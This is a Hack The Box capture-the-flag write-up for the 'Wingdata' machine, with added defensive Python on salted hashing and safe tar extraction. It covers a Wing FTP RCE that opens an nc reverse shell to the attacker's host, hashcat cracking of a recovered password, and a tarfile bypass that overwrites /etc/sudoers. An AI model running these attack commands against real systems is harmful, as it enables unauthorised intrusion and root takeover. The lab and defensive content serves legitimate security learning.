
Hack The Box

Wingdata

Tags: HTB, Easy, Linux, Web, RCE, PrivEsc

Summary

Wingdata is an Easy Linux machine running Wing FTP Server v7.4.3, vulnerable to an unauthenticated RCE (CVE-2025-47812) that yields a shell as wingftp. Local user XML files expose a salted SHA-256 hash that is cracked (custom salt WingFTP) for SSH access as wacky. A sudo-allowed backup script using Python's tarfile is exploited via a tar extraction bypass (CVE-2025-4517) to overwrite /etc/sudoers and escalate to root.

Machine Information

Name: Wingdata
Difficulty: Easy
OS: Linux
Platform: Hack The Box

Attack Path

  1. Initial enumeration with Nmap.
  2. Identify Wing FTP Server v7.4.3.
  3. Exploit unauthenticated RCE (CVE-2025-47812).
  4. Initial shell as wingftp.
  5. Local enumeration and credential collection.
  6. Crack a salted hash (custom salt).
  7. SSH access as wacky.
  8. sudo enumeration.
  9. Exploit the Python tarfile bypass (CVE-2025-4517).
  10. Obtain root.

Reconnaissance

Initial enumeration was performed with Nmap.

nmap -sC -sV -A 10.129.29.71

Nmap Scan

Two ports were open: 22 (SSH) for later access and 80 (HTTP) as the main attack vector.

Web Enumeration

The web application was a corporate site for "Wing Data Solutions". Browsing revealed the Wing FTP Server Web Client, which disclosed the version:

Web page

Wing FTP Server v7.4.3

Wing FTP

The exact version made it possible to search for version-specific vulnerabilities.

Exploitation — Wing FTP RCE (CVE-2025-47812)

Wing FTP Server v7.4.3 is vulnerable to unauthenticated RCE via manipulation of the username parameter on the login endpoint.

Exploit DB

A public Python exploit was used, first validating execution with whoami:

python3 exploit.py -u http://ftp.wingdata.htb -v

whoami

Then to obtain a reverse shell:

python3 exploit.py -u http://ftp.wingdata.htb -v -c "nc -c sh 10.10.14.233 1337"

Exploit

Initial Access

A listener was prepared on the attacker machine, and the exploit returned a shell as the wingftp service user.

nc -nvlp 1337

Reverse shell

Privilege Escalation

Credential collection

Local enumeration found user XML files containing password hashes:

/opt/wftpserver/Data/1/users/

wacky.xml exposed a hash:

Hash

32940defd3c3ef70a2dd44a5301ff984c4742f0baae76ff5b8783994f8a503ca

Cracking the salted hash

Plain SHA-256 failed; the system used the fixed salt WingFTP. Hashcat cracked it with mode 1410 (sha256($pass.$salt)), with hash.txt holding the hash in hash:salt form:

hashcat -m 1410 hash.txt /usr/share/wordlists/rockyou.txt

Hashcat

!#7Blushing^*Bride5

These credentials were reused for a stable SSH session as wacky:

ssh wacky@ftp.wingdata.htb

SSH
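Why a fixed, application-wide salt is a weak credential store, and what the same storage would look like with a per-user random salt and a slow KDF. This is an added example that is not part of the writeup or of Wing FTP; it follows the scheme the writeup describes (SHA-256 over password followed by the constant salt WingFTP, i.e. hashcat mode 1410) and assumes that ordering. The scrypt parameters and the `scrypt$n$salt$digest` encoding are my own choices.

```python
import hashlib
import hmac
import os
from typing import Optional

# Salt as described in the writeup: a constant shared by every account.
FIXED_SALT = "WingFTP"


def wingftp_style_hash(password: str, salt: str = FIXED_SALT) -> str:
    """sha256(password + salt): one fast hash, same salt for everyone."""
    return hashlib.sha256((password + salt).encode("utf-8")).hexdigest()


def verify_wingftp_style(stored_hex: str, candidate: str, salt: str = FIXED_SALT) -> bool:
    """Constant-time comparison of a candidate against a stored fixed-salt hash."""
    return hmac.compare_digest(wingftp_style_hash(candidate, salt), stored_hex)


def find_shared_hashes(user_hashes: dict) -> list:
    """Audit helper: with a fixed salt, accounts that share a password share a hash,
    so identical digests leak password reuse before anything is cracked."""
    by_hash = {}
    for user, digest in user_hashes.items():
        by_hash.setdefault(digest, []).append(user)
    return [sorted(users) for users in by_hash.values() if len(users) > 1]


def hardened_hash(password: str, salt: Optional[bytes] = None, n: int = 2 ** 14) -> str:
    """Per-user 16-byte random salt + memory-hard scrypt (n=2^14, r=8, p=1, 16 MiB).
    Encoded as scrypt$n$salt_hex$digest_hex so the verifier can recover the parameters."""
    if salt is None:
        salt = os.urandom(16)
    digest = hashlib.scrypt(password.encode("utf-8"), salt=salt, n=n, r=8, p=1, dklen=32)
    return f"scrypt${n}${salt.hex()}${digest.hex()}"


def verify_hardened(stored: str, candidate: str) -> bool:
    """Re-derive with the stored salt and parameters, then compare in constant time."""
    scheme, n, salt_hex, _digest_hex = stored.split("$")
    if scheme != "scrypt":
        raise ValueError("unknown hash scheme")
    recomputed = hardened_hash(candidate, bytes.fromhex(salt_hex), int(n))
    return hmac.compare_digest(recomputed, stored)


if __name__ == "__main__":
    # Constructed demo accounts, not values from the box.
    pw = "correct horse battery staple"
    weak = {"alice": wingftp_style_hash(pw), "bob": wingftp_style_hash(pw),
            "carol": wingftp_style_hash("something else")}
    print("fixed salt, shared passwords visible:", find_shared_hashes(weak))
    strong = {u: hardened_hash(pw) for u in ("alice", "bob")}
    print("random salt, same password, distinct records:", strong["alice"] != strong["bob"])
```

The fixed salt only defeats a generic SHA-256 rainbow table; a wordlist run still costs one SHA-256 per candidate, which is why rockyou finished on this box. A per-user salt plus scrypt, bcrypt or Argon2 makes every account a separate, slow search, and reading the XML files then yields far less.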

tarfile bypass (CVE-2025-4517)

sudo -l showed wacky could run a backup script as root:

/usr/local/bin/python3 /opt/backup_clients/restore_backup_clients.py *

The script extracted archives with tar.extractall(path=staging_dir, filter="data"). On the Python build installed on the box, that filter could be bypassed (CVE-2025-4517) with a symlink/hardlink combination, allowing arbitrary writes as root.

CVE
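How a backup restore script can refuse the member types this escalation depends on instead of trusting the extraction filter alone. This is an added example, not the machine's restore_backup_clients.py (which the writeup does not reproduce); the only detail taken from the page is the `extractall(..., filter="data")` call. The policy is my own: accept only regular files and directories whose normalised path stays under the staging directory, reject every symlink and hardlink member up front, and keep the stdlib "data" filter as a second layer where the interpreter has it. The sample archive is constructed inline to show each rejection.

```python
import io
import os
import tarfile
import tempfile


def audit_tar_members(archive: bytes, dest: str) -> dict:
    """Classify every member before anything touches the filesystem.

    Rejecting all link members removes the link-then-write-through-it pattern;
    checking the normalised target path catches '../' and absolute names.
    """
    dest_abs = os.path.abspath(dest)
    safe, rejected = [], []
    with tarfile.open(fileobj=io.BytesIO(archive), mode="r:*") as tar:
        for m in tar.getmembers():
            if m.issym() or m.islnk():
                rejected.append((m.name, "link member"))
                continue
            if not (m.isfile() or m.isdir()):
                rejected.append((m.name, "special file"))
                continue
            target = os.path.normpath(os.path.join(dest_abs, m.name))
            if os.path.commonpath([dest_abs, target]) != dest_abs:
                rejected.append((m.name, "path escapes destination"))
                continue
            safe.append(m.name)
    return {"safe": safe, "rejected": rejected}


def safe_extract(archive: bytes, dest: str) -> dict:
    """Extract only the audited members; return the audit report."""
    report = audit_tar_members(archive, dest)
    allowed = set(report["safe"])
    with tarfile.open(fileobj=io.BytesIO(archive), mode="r:*") as tar:
        members = [m for m in tar.getmembers() if m.name in allowed]
        # Second layer: the stdlib data filter (3.12+, and the 3.8-3.11 backports).
        extra = {"filter": "data"} if hasattr(tarfile, "data_filter") else {}
        tar.extractall(path=dest, members=members, **extra)
    return report


def build_demo_archive() -> bytes:
    """Constructed archive: one legitimate client file plus three hostile members."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w") as tar:
        def add_file(name: str, content: str) -> None:
            info = tarfile.TarInfo(name)
            data = content.encode("utf-8")
            info.size = len(data)
            tar.addfile(info, io.BytesIO(data))

        add_file("clients/a.txt", "alice\n")          # legitimate
        add_file("../escape.txt", "outside\n")        # parent-directory traversal
        add_file("/etc/evil", "absolute\n")           # absolute path
        link = tarfile.TarInfo("staging_link")         # symlink into the host
        link.type = tarfile.SYMTYPE
        link.linkname = "/etc"
        tar.addfile(link)
    return buf.getvalue()


def run_demo() -> dict:
    """Extract the demo archive into a throwaway staging dir and summarise."""
    with tempfile.TemporaryDirectory() as staging:
        report = safe_extract(build_demo_archive(), staging)
        return {
            "extracted": sorted(report["safe"]),
            "rejected": sorted(name for name, _ in report["rejected"]),
            "good_file_present": os.path.isfile(os.path.join(staging, "clients", "a.txt")),
            "escape_file_present": os.path.exists(
                os.path.join(os.path.dirname(staging), "escape.txt")),
        }


if __name__ == "__main__":
    for key, value in run_demo().items():
        print(f"{key}: {value}")
```

This validation is in addition to, not a replacement for, running a Python release that fixes CVE-2025-4517. The sudo rule is the other half: a rule that lets a user pass any argument (`*`) to a root-run extractor hands the user control of the input; restricting the script to archives from a root-owned directory, or dropping the wildcard, removes the path from this issue to root.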

A PoC was used to craft a malicious .tar that escapes the directory and overwrites /etc/sudoers, granting wacky full sudo:

python3 /tmp/CVE-2025-4517-POC.py

Privilege escalation

wacky ALL=(ALL) NOPASSWD: ALL

A root shell was then trivial:

sudo /bin/bash

Flags

User

cat /home/wacky/user.txt

User flag

621bc7d792d7ae33963b5dc2d2a2216

Root

cat /root/root.txt

Root flag

10249185de33be92fb5d2ed29f74a025

Vulnerabilities Identified

Wing FTP RCE (CVE-2025-47812)

Impact: initial foothold as the wingftp service user.

Exposed Credentials

Impact: offline credential recovery and SSH access.

Python tarfile Bypass (CVE-2025-4517)

Impact: arbitrary file write as root and full privilege escalation.

Insecure sudo Script

Impact: enabled the tarfile bypass to reach root.

Tools Used

Key Takeaways